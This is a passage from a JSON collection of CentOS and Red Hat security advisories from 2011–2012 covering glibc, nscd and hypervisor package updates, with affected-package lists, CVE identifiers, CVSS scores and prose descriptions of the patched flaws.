"glibc-utils", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.3.4-2.57", "packageFilename": "glibc-profile-2.3.4-2.57.x86_64.rpm", "packageName": "glibc-profile", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.3.4-2.57", "packageFilename": "nscd-2.3.4-2.57.x86_64.rpm", "packageName": "nscd", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.3.4-2.57", "packageFilename": "glibc-common-2.3.4-2.57.x86_64.rpm", "packageName": "glibc-common", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.3.4-2.57", "packageFilename": "glibc-utils-2.3.4-2.57.x86_64.rpm", "packageName": "glibc-utils", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.3.4-2.57", "packageFilename": "glibc-headers-2.3.4-2.57.x86_64.rpm", "packageName": "glibc-headers", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.3.4-2.57", "packageFilename": "nptl-devel-2.3.4-2.57.i386.rpm", "packageName": "nptl-devel", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.3.4-2.57", "packageFilename": "glibc-headers-2.3.4-2.57.i386.rpm", "packageName": "glibc-headers", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.3.4-2.57", "packageFilename": "glibc-2.3.4-2.57.i686.rpm", "packageName": "glibc", "arch": "i686", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.3.4-2.57", "packageFilename": "glibc-2.3.4-2.57.i686.rpm", "packageName": "glibc", "arch": "i686", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.3.4-2.57", "packageFilename": "glibc-common-2.3.4-2.57.i386.rpm", "packageName": "glibc-common", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.3.4-2.57", "packageFilename": "glibc-2.3.4-2.57.x86_64.rpm", "packageName": "glibc", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.3.4-2.57", "packageFilename": "nptl-devel-2.3.4-2.57.i686.rpm", "packageName": "nptl-devel", "arch": "i686", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.3.4-2.57", "packageFilename": "nptl-devel-2.3.4-2.57.x86_64.rpm", "packageName": "nptl-devel", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.3.4-2.57", "packageFilename": "glibc-2.3.4-2.57.i386.rpm", "packageName": "glibc", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.3.4-2.57", "packageFilename": "glibc-devel-2.3.4-2.57.x86_64.rpm", "packageName": "glibc-devel", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.3.4-2.57", "packageFilename": "glibc-devel-2.3.4-2.57.i386.rpm", "packageName": "glibc-devel", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.3.4-2.57", "packageFilename": "glibc-devel-2.3.4-2.57.i386.rpm", "packageName": "glibc-devel", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.3.4-2.57", "packageFilename": "nscd-2.3.4-2.57.i386.rpm", "packageName": "nscd", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.3.4-2.57", "packageFilename": "glibc-profile-2.3.4-2.57.i386.rpm", "packageName": "glibc-profile", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.3.4-2.57", "packageFilename": "glibc-2.3.4-2.57.src.rpm", "packageName": "glibc", "arch": "any", "operator": "lt"}], "description": "**CentOS Errata and Security Advisory** CESA-2012:0125\n\n\nThe glibc packages contain the standard C libraries used by multiple\nprograms on the system. These packages contain the standard C and the\nstandard math libraries. Without these two libraries, a Linux system cannot\nfunction properly.\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way the glibc library read timezone files. If a\ncarefully-crafted timezone file was loaded by an application linked against\nglibc, it could cause the application to crash or, potentially, execute\narbitrary code with the privileges of the user running the application.\n(CVE-2009-5029)\n\nA flaw was found in the way the ldd utility identified dynamically linked\nlibraries. If an attacker could trick a user into running ldd on a\nmalicious binary, it could result in arbitrary code execution with the\nprivileges of the user running ldd. (CVE-2009-5064)\n\nIt was discovered that the glibc addmntent() function, used by various\nmount helper utilities, did not sanitize its input properly. A local\nattacker could possibly use this flaw to inject malformed lines into the\nmtab (mounted file systems table) file via certain setuid mount helpers, if\nthe attacker were allowed to mount to an arbitrary directory under their\ncontrol. (CVE-2010-0296)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way the glibc library loaded ELF (Executable and Linking\nFormat) files. If a carefully-crafted ELF file was loaded by an\napplication linked against glibc, it could cause the application to crash\nor, potentially, execute arbitrary code with the privileges of the user\nrunning the application. (CVE-2010-0830)\n\nIt was discovered that the glibc fnmatch() function did not properly\nrestrict the use of alloca(). If the function was called on sufficiently\nlarge inputs, it could cause an application using fnmatch() to crash or,\npossibly, execute arbitrary code with the privileges of the application.\n(CVE-2011-1071)\n\nIt was found that the glibc addmntent() function, used by various mount\nhelper utilities, did not handle certain errors correctly when updating the\nmtab (mounted file systems table) file. If such utilities had the setuid\nbit set, a local attacker could use this flaw to corrupt the mtab file.\n(CVE-2011-1089)\n\nIt was discovered that the locale command did not produce properly escaped\noutput as required by the POSIX specification. If an attacker were able to\nset the locale environment variables in the environment of a script that\nperformed shell evaluation on the output of the locale command, and that\nscript were run with different privileges than the attacker's, it could\nexecute arbitrary code with the privileges of the script. (CVE-2011-1095)\n\nAn integer overflow flaw was found in the glibc fnmatch() function. If an\nattacker supplied a long UTF-8 string to an application linked against\nglibc, it could cause the application to crash. (CVE-2011-1659)\n\nA denial of service flaw was found in the remote procedure call (RPC)\nimplementation in glibc. A remote attacker able to open a large number of\nconnections to an RPC service that is using the RPC implementation from\nglibc, could use this flaw to make that service use an excessive amount of\nCPU time. (CVE-2011-4609)\n\nRed Hat would like to thank the Ubuntu Security Team for reporting\nCVE-2010-0830, and Dan Rosenberg for reporting CVE-2011-1089. The Ubuntu\nSecurity Team acknowledges Dan Rosenberg as the original reporter of\nCVE-2010-0830.\n\nThis update also fixes the following bug:\n\n* When using an nscd package that is a different version than the glibc\npackage, the nscd service could fail to start. This update makes the nscd\npackage require a specific glibc version to prevent this problem.\n(BZ#657009)\n\nUsers should upgrade to these updated packages, which resolve these issues.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2012-February/018427.html\n\n**Affected packages:**\nglibc\nglibc-common\nglibc-devel\nglibc-headers\nglibc-profile\nglibc-utils\nnptl-devel\nnscd\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2012-0125.html", "edition": 2, "reporter": "CentOS Project", "published": "2012-02-13T21:09:08", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "title": "glibc, nptl, nscd security update", "type": "centos", "bulletinFamily": "unix", "cvelist": ["CVE-2011-4609", "CVE-2010-0296", "CVE-2011-1659", "CVE-2010-0830", "CVE-2011-1071", "CVE-2011-1095", "CVE-2009-5029", "CVE-2011-1089", "CVE-2009-5064"], "modified": "2012-02-13T21:09:08", "href": "http://lists.centos.org/pipermail/centos-announce/2012-February/018427.html", "id": "CESA-2012:0125", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-10-03T18:25:31", "references": ["https://rhn.redhat.com/errata/RHSA-2012-0058.html"], "affectedPackage": [{"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.12-1.47.el6_2.5", "packageFilename": "glibc-headers-2.12-1.47.el6_2.5.i686.rpm", "packageName": "glibc-headers", "arch": "i686", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.12-1.47.el6_2.5", "packageFilename": "glibc-2.12-1.47.el6_2.5.i686.rpm", "packageName": "glibc", "arch": "i686", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.12-1.47.el6_2.5", "packageFilename": "glibc-2.12-1.47.el6_2.5.i686.rpm", "packageName": "glibc", "arch": "i686", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.12-1.47.el6_2.5", "packageFilename": "glibc-static-2.12-1.47.el6_2.5.i686.rpm", "packageName": "glibc-static", "arch": "i686", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.12-1.47.el6_2.5", "packageFilename": "glibc-static-2.12-1.47.el6_2.5.i686.rpm", "packageName": "glibc-static", "arch": "i686", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.12-1.47.el6_2.5", "packageFilename": "glibc-utils-2.12-1.47.el6_2.5.i686.rpm", "packageName": "glibc-utils", "arch": "i686", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.12-1.47.el6_2.5", "packageFilename": "glibc-2.12-1.47.el6_2.5.src.rpm", "packageName": "glibc", "arch": "any", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.12-1.47.el6_2.5", "packageFilename": "glibc-headers-2.12-1.47.el6_2.5.x86_64.rpm", "packageName": "glibc-headers", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.12-1.47.el6_2.5", "packageFilename": "nscd-2.12-1.47.el6_2.5.i686.rpm", "packageName": "nscd", "arch": "i686", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.12-1.47.el6_2.5", "packageFilename": "glibc-static-2.12-1.47.el6_2.5.x86_64.rpm", "packageName": "glibc-static", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.12-1.47.el6_2.5", "packageFilename": "glibc-common-2.12-1.47.el6_2.5.i686.rpm", "packageName": "glibc-common", "arch": "i686", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.12-1.47.el6_2.5", "packageFilename": "glibc-common-2.12-1.47.el6_2.5.x86_64.rpm", "packageName": "glibc-common", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.12-1.47.el6_2.5", "packageFilename": "glibc-utils-2.12-1.47.el6_2.5.x86_64.rpm", "packageName": "glibc-utils", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.12-1.47.el6_2.5", "packageFilename": "glibc-devel-2.12-1.47.el6_2.5.x86_64.rpm", "packageName": "glibc-devel", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.12-1.47.el6_2.5", "packageFilename": "glibc-2.12-1.47.el6_2.5.x86_64.rpm", "packageName": "glibc", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.12-1.47.el6_2.5", "packageFilename": "glibc-devel-2.12-1.47.el6_2.5.i686.rpm", "packageName": "glibc-devel", "arch": "i686", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.12-1.47.el6_2.5", "packageFilename": "glibc-devel-2.12-1.47.el6_2.5.i686.rpm", "packageName": "glibc-devel", "arch": "i686", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.12-1.47.el6_2.5", "packageFilename": "nscd-2.12-1.47.el6_2.5.x86_64.rpm", "packageName": "nscd", "arch": "x86_64", "operator": "lt"}], "description": "**CentOS Errata and Security Advisory** CESA-2012:0058\n\n\nThe glibc packages contain the standard C libraries used by multiple\nprograms on the system. These packages contain the standard C and the\nstandard math libraries. Without these two libraries, a Linux system cannot\nfunction properly.\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way the glibc library read timezone files. If a\ncarefully-crafted timezone file was loaded by an application linked against\nglibc, it could cause the application to crash or, potentially, execute\narbitrary code with the privileges of the user running the application.\n(CVE-2009-5029)\n\nA denial of service flaw was found in the remote procedure call (RPC)\nimplementation in glibc. A remote attacker able to open a large number of\nconnections to an RPC service that is using the RPC implementation from\nglibc, could use this flaw to make that service use an excessive amount of\nCPU time. (CVE-2011-4609)\n\nThis update also fixes the following bugs:\n\n* glibc had incorrect information for numeric separators and groupings for\nspecific French, Spanish, and German locales. Therefore, applications\nutilizing glibc's locale support printed numbers with the wrong separators\nand groupings when those locales were in use. With this update, the\nseparator and grouping information has been fixed. (BZ#754116)\n\n* The RHBA-2011:1179 glibc update introduced a regression, causing glibc to\nincorrectly parse groups with more than 126 members, resulting in\napplications such as \"id\" failing to list all the groups a particular user\nwas a member of. With this update, group parsing has been fixed.\n(BZ#766484)\n\n* glibc incorrectly allocated too much memory due to a race condition\nwithin its own malloc routines. This could cause a multi-threaded\napplication to allocate more memory than was expected. With this update,\nthe race condition has been fixed, and malloc's behavior is now consistent\nwith the documentation regarding the MALLOC_ARENA_TEST and MALLOC_ARENA_MAX\nenvironment variables. (BZ#769594)\n\nUsers should upgrade to these updated packages, which contain backported\npatches to resolve these issues.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2012-January/018397.html\n\n**Affected packages:**\nglibc\nglibc-common\nglibc-devel\nglibc-headers\nglibc-static\nglibc-utils\nnscd\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2012-0058.html", "edition": 1, "reporter": "CentOS Project", "published": "2012-01-30T15:26:30", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "title": "glibc, nscd security update", "type": "centos", "bulletinFamily": "unix", "cvelist": ["CVE-2011-4609", "CVE-2009-5029"], "modified": "2012-01-30T15:26:30", "href": "http://lists.centos.org/pipermail/centos-announce/2012-January/018397.html", "id": "CESA-2012:0058", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "redhat": [{"lastseen": "2018-12-11T17:42:23", "_object_types": ["robots.models.redhat.RedHatBulletin", "robots.models.base.Bulletin"], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.5-65.el5_7.3", "arch": "i386", "packageName": "glibc", "packageFilename": "glibc-2.5-65.el5_7.3.i386.rpm", "operator": "lt"}], "description": "The glibc packages contain the standard C libraries used by multiple\nprograms on the system. These packages contain the standard C and the\nstandard math libraries. Without these two libraries, a Linux system cannot\nfunction properly.\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way the glibc library read timezone files. If a\ncarefully-crafted timezone file was loaded by an application linked against\nglibc, it could cause the application to crash or, potentially, execute\narbitrary code with the privileges of the user running the application.\n(CVE-2009-5029)\n\nA flaw was found in the way the ldd utility identified dynamically linked\nlibraries. If an attacker could trick a user into running ldd on a\nmalicious binary, it could result in arbitrary code execution with the\nprivileges of the user running ldd. (CVE-2009-5064)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way the glibc library loaded ELF (Executable and Linking\nFormat) files. If a carefully-crafted ELF file was loaded by an\napplication linked against glibc, it could cause the application to crash\nor, potentially, execute arbitrary code with the privileges of the user\nrunning the application. (CVE-2010-0830)\n\nIt was found that the glibc addmntent() function, used by various mount\nhelper utilities, did not handle certain errors correctly when updating the\nmtab (mounted file systems table) file. If such utilities had the setuid\nbit set, a local attacker could use this flaw to corrupt the mtab file.\n(CVE-2011-1089)\n\nA denial of service flaw was found in the remote procedure call (RPC)\nimplementation in glibc. A remote attacker able to open a large number of\nconnections to an RPC service that is using the RPC implementation from\nglibc, could use this flaw to make that service use an excessive amount of\nCPU time. (CVE-2011-4609)\n\nRed Hat would like to thank the Ubuntu Security Team for reporting\nCVE-2010-0830, and Dan Rosenberg for reporting CVE-2011-1089. The Ubuntu\nSecurity Team acknowledges Dan Rosenberg as the original reporter of\nCVE-2010-0830.\n\nUsers should upgrade to these updated packages, which resolve these issues.\n", "reporter": "RedHat", "published": "2012-02-13T05:00:00", "type": "redhat", "title": "(RHSA-2012:0126) Moderate: glibc security update", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "bulletinFamily": "unix", "cvelist": ["CVE-2009-5029", "CVE-2009-5064", "CVE-2010-0830", "CVE-2011-1089", "CVE-2011-4609"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2017-09-08T12:08:12", "id": "RHSA-2012:0126", "href": "https://access.redhat.com/errata/RHSA-2012:0126", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-12-11T17:45:46", "_object_types": ["robots.models.redhat.RedHatBulletin", "robots.models.base.Bulletin"], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "any", "packageVersion": "2.3.4-2.57", "arch": "i386", "packageName": "glibc-devel", "packageFilename": "glibc-devel-2.3.4-2.57.i386.rpm", "operator": "lt"}], "description": "The glibc packages contain the standard C libraries used by multiple\nprograms on the system. These packages contain the standard C and the\nstandard math libraries. Without these two libraries, a Linux system cannot\nfunction properly.\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way the glibc library read timezone files. If a\ncarefully-crafted timezone file was loaded by an application linked against\nglibc, it could cause the application to crash or, potentially, execute\narbitrary code with the privileges of the user running the application.\n(CVE-2009-5029)\n\nA flaw was found in the way the ldd utility identified dynamically linked\nlibraries. If an attacker could trick a user into running ldd on a\nmalicious binary, it could result in arbitrary code execution with the\nprivileges of the user running ldd. (CVE-2009-5064)\n\nIt was discovered that the glibc addmntent() function, used by various\nmount helper utilities, did not sanitize its input properly. A local\nattacker could possibly use this flaw to inject malformed lines into the\nmtab (mounted file systems table) file via certain setuid mount helpers, if\nthe attacker were allowed to mount to an arbitrary directory under their\ncontrol. (CVE-2010-0296)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way the glibc library loaded ELF (Executable and Linking\nFormat) files. If a carefully-crafted ELF file was loaded by an\napplication linked against glibc, it could cause the application to crash\nor, potentially, execute arbitrary code with the privileges of the user\nrunning the application. (CVE-2010-0830)\n\nIt was discovered that the glibc fnmatch() function did not properly\nrestrict the use of alloca(). If the function was called on sufficiently\nlarge inputs, it could cause an application using fnmatch() to crash or,\npossibly, execute arbitrary code with the privileges of the application.\n(CVE-2011-1071)\n\nIt was found that the glibc addmntent() function, used by various mount\nhelper utilities, did not handle certain errors correctly when updating the\nmtab (mounted file systems table) file. If such utilities had the setuid\nbit set, a local attacker could use this flaw to corrupt the mtab file.\n(CVE-2011-1089)\n\nIt was discovered that the locale command did not produce properly escaped\noutput as required by the POSIX specification. If an attacker were able to\nset the locale environment variables in the environment of a script that\nperformed shell evaluation on the output of the locale command, and that\nscript were run with different privileges than the attacker's, it could\nexecute arbitrary code with the privileges of the script. (CVE-2011-1095)\n\nAn integer overflow flaw was found in the glibc fnmatch() function. If an\nattacker supplied a long UTF-8 string to an application linked against\nglibc, it could cause the application to crash. (CVE-2011-1659)\n\nA denial of service flaw was found in the remote procedure call (RPC)\nimplementation in glibc. A remote attacker able to open a large number of\nconnections to an RPC service that is using the RPC implementation from\nglibc, could use this flaw to make that service use an excessive amount of\nCPU time. (CVE-2011-4609)\n\nRed Hat would like to thank the Ubuntu Security Team for reporting\nCVE-2010-0830, and Dan Rosenberg for reporting CVE-2011-1089. The Ubuntu\nSecurity Team acknowledges Dan Rosenberg as the original reporter of\nCVE-2010-0830.\n\nThis update also fixes the following bug:\n\n* When using an nscd package that is a different version than the glibc\npackage, the nscd service could fail to start. This update makes the nscd\npackage require a specific glibc version to prevent this problem.\n(BZ#657009)\n\nUsers should upgrade to these updated packages, which resolve these issues.\n", "reporter": "RedHat", "published": "2012-02-13T05:00:00", "type": "redhat", "title": "(RHSA-2012:0125) Moderate: glibc security and bug fix update", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "bulletinFamily": "unix", "cvelist": ["CVE-2009-5029", "CVE-2009-5064", "CVE-2010-0296", "CVE-2010-0830", "CVE-2011-1071", "CVE-2011-1089", "CVE-2011-1095", "CVE-2011-1659", "CVE-2011-4609"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2017-09-08T12:12:17", "id": "RHSA-2012:0125", "href": "https://access.redhat.com/errata/RHSA-2012:0125", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-12-11T19:40:54", "_object_types": ["robots.models.base.Bulletin", "robots.models.redhat.RedHatBulletin"], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.12-1.47.el6", "arch": "i686", "packageName": "glibc-debuginfo", "packageFilename": "glibc-debuginfo-2.12-1.47.el6.i686.rpm", "operator": "lt"}], "description": "The glibc packages contain the standard C libraries used by multiple\nprograms on the system. These packages contain the standard C and the\nstandard math libraries. Without these two libraries, a Linux system\ncannot function properly.\n\nA flaw was found in the way the ldd utility identified dynamically linked\nlibraries. If an attacker could trick a user into running ldd on a\nmalicious binary, it could result in arbitrary code execution with the\nprivileges of the user running ldd. (CVE-2009-5064)\n\nIt was found that the glibc addmntent() function, used by various mount\nhelper utilities, did not handle certain errors correctly when updating the\nmtab (mounted file systems table) file. If such utilities had the setuid\nbit set, a local attacker could use this flaw to corrupt the mtab file.\n(CVE-2011-1089)\n\nRed Hat would like to thank Dan Rosenberg for reporting the CVE-2011-1089\nissue.\n\nThis update also fixes several bugs and adds various enhancements.\nDocumentation for these bug fixes and enhancements will be available\nshortly from the Technical Notes document, linked to in the References\nsection.\n\nUsers are advised to upgrade to these updated glibc packages, which contain\nbackported patches to resolve these issues and add these enhancements.\n", "reporter": "RedHat", "published": "2011-12-06T05:00:00", "type": "redhat", "title": "(RHSA-2011:1526) Low: glibc security, bug fix, and enhancement update", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "bulletinFamily": "unix", "cvelist": ["CVE-2009-5064", "CVE-2011-1089"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2018-06-06T20:24:09", "id": "RHSA-2011:1526", "href": "https://access.redhat.com/errata/RHSA-2011:1526", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-12-11T19:41:45", "_object_types": ["robots.models.base.Bulletin", "robots.models.redhat.RedHatBulletin"], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.12-1.47.el6_2.5", "arch": "i686", "packageName": "glibc-debuginfo-common", "packageFilename": "glibc-debuginfo-common-2.12-1.47.el6_2.5.i686.rpm", "operator": "lt"}], "description": "The glibc packages contain the standard C libraries used by multiple\nprograms on the system. These packages contain the standard C and the\nstandard math libraries. Without these two libraries, a Linux system cannot\nfunction properly.\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way the glibc library read timezone files. If a\ncarefully-crafted timezone file was loaded by an application linked against\nglibc, it could cause the application to crash or, potentially, execute\narbitrary code with the privileges of the user running the application.\n(CVE-2009-5029)\n\nA denial of service flaw was found in the remote procedure call (RPC)\nimplementation in glibc. A remote attacker able to open a large number of\nconnections to an RPC service that is using the RPC implementation from\nglibc, could use this flaw to make that service use an excessive amount of\nCPU time. (CVE-2011-4609)\n\nThis update also fixes the following bugs:\n\n* glibc had incorrect information for numeric separators and groupings for\nspecific French, Spanish, and German locales. Therefore, applications\nutilizing glibc's locale support printed numbers with the wrong separators\nand groupings when those locales were in use. With this update, the\nseparator and grouping information has been fixed. (BZ#754116)\n\n* The RHBA-2011:1179 glibc update introduced a regression, causing glibc to\nincorrectly parse groups with more than 126 members, resulting in\napplications such as \"id\" failing to list all the groups a particular user\nwas a member of. With this update, group parsing has been fixed.\n(BZ#766484)\n\n* glibc incorrectly allocated too much memory due to a race condition\nwithin its own malloc routines. This could cause a multi-threaded\napplication to allocate more memory than was expected. With this update,\nthe race condition has been fixed, and malloc's behavior is now consistent\nwith the documentation regarding the MALLOC_ARENA_TEST and MALLOC_ARENA_MAX\nenvironment variables. (BZ#769594)\n\nUsers should upgrade to these updated packages, which contain backported\npatches to resolve these issues.\n", "reporter": "RedHat", "published": "2012-01-24T05:00:00", "type": "redhat", "title": "(RHSA-2012:0058) Moderate: glibc security and bug fix update", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "unix", "cvelist": ["CVE-2009-5029", "CVE-2011-4609"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2018-06-06T20:24:36", "id": "RHSA-2012:0058", "href": "https://access.redhat.com/errata/RHSA-2012:0058", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-12-11T19:42:55", "_object_types": ["robots.models.base.Bulletin", "robots.models.redhat.RedHatBulletin"], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "6", "packageVersion": "6.2-20120209.0.el6_2", "arch": "noarch", "packageName": "rhev-hypervisor6-tools", "packageFilename": "rhev-hypervisor6-tools-6.2-20120209.0.el6_2.noarch.rpm", "operator": "lt"}], "description": "The rhev-hypervisor6 package provides a Red Hat Enterprise Virtualization\nHypervisor ISO disk image. The Red Hat Enterprise Virtualization Hypervisor\nis a dedicated Kernel-based Virtual Machine (KVM) hypervisor. It includes\neverything necessary to run and manage virtual machines: A subset of the\nRed Hat Enterprise Linux operating environment and the Red Hat Enterprise\nVirtualization Agent.\n\nNote: Red Hat Enterprise Virtualization Hypervisor is only available for\nthe Intel 64 and AMD64 architectures with virtualization extensions.\n\nA heap overflow flaw was found in the way QEMU-KVM emulated the e1000\nnetwork interface card. A privileged guest user in a virtual machine whose\nnetwork interface is configured to use the e1000 emulated driver could use\nthis flaw to crash the host or, possibly, escalate their privileges on the\nhost. (CVE-2012-0029)\n\nAn information leak flaw was found in the SSL 3.0 protocol implementation\nin OpenSSL. Incorrect initialization of SSL record padding bytes could\ncause an SSL client or server to send a limited amount of possibly\nsensitive data to its SSL peer via the encrypted connection.\n(CVE-2011-4576)\n\nA denial of service flaw was found in the RFC 3779 implementation in\nOpenSSL. A remote attacker could use this flaw to make an application using\nOpenSSL exit unexpectedly by providing a specially-crafted X.509\ncertificate that has malformed RFC 3779 extension data. (CVE-2011-4577)\n\nIt was discovered that OpenSSL did not limit the number of TLS/SSL\nhandshake restarts required to support Server Gated Cryptography. A remote\nattacker could use this flaw to make a TLS/SSL server using OpenSSL consume\nan excessive amount of CPU by continuously restarting the handshake.\n(CVE-2011-4619)\n\nRed Hat would like to thank Nicolae Mogoreanu for reporting CVE-2012-0029.\n\nThis updated package provides updated components that include fixes for\nvarious security issues. These issues have no security impact on Red Hat\nEnterprise Virtualization Hypervisor itself, however. The security fixes\nincluded in this update address the following CVE numbers:\n\nCVE-2009-5029 and CVE-2011-4609 (glibc issues)\n\nCVE-2012-0056 (kernel issue)\n\nCVE-2011-4108 and CVE-2012-0050 (openssl issues)\n\nThis update also fixes the following bugs:\n\n* Previously, it was possible to begin a Hypervisor installation without\nany valid disks to install to.\n\nNow, if no valid disks are found for Hypervisor installation, a message is\ndisplayed informing the user that there are no valid disks for\ninstallation. (BZ#781471)\n\n* Previously, the user interface for the Hypervisor did not indicate\nwhether the system was registered with Red Hat Network (RHN) Classic or RHN\nSatellite. As a result, customers could not easily determine the\nregistration status of their Hypervisor installations.\n\nThe TUI has been updated to display the registration status of the\nHypervisor. (BZ#788223)\n\n* Previously, autoinstall would fail if the firstboot or reinstall options\nwere passed but local_boot or upgrade were not passed. Now, neither the\nlocal_boot or upgrade parameters are required for autoinstall. (BZ#788225)\n\nUsers of the Red Hat Enterprise Virtualization Hypervisor are advised to\nupgrade to this updated package, which fixes these issues.\n", "reporter": "RedHat", "published": "2012-02-15T05:00:00", "type": "redhat", "title": "(RHSA-2012:0109) Important: rhev-hypervisor6 security and bug fix update", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "unix", "cvelist": ["CVE-2009-5029", "CVE-2011-4108", "CVE-2011-4576", "CVE-2011-4577", "CVE-2011-4609", "CVE-2011-4619", "CVE-2012-0029", "CVE-2012-0050", "CVE-2012-0056"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2018-06-07T08:59:39", "id": "RHSA-2012:0109", "href": "https://access.redhat.com/errata/RHSA-2012:0109", "cvss": {"score": 7.4, "vector": "AV:ADJACENT_NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-12-11T17:43:34", "_object_types": ["robots.models.redhat.RedHatBulletin", "robots.models.base.Bulletin"], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "5", "packageVersion": "5.8-20120202.0.el5", "arch": "noarch", "packageName": "rhev-hypervisor5-tools", "packageFilename": "rhev-hypervisor5-tools-5.8-20120202.0.el5.noarch.rpm", "operator": "lt"}], "description": "The rhev-hypervisor5 package provides a Red Hat Enterprise Virtualization\nHypervisor ISO disk image. The Red Hat Enterprise Virtualization\nHypervisor is a dedicated 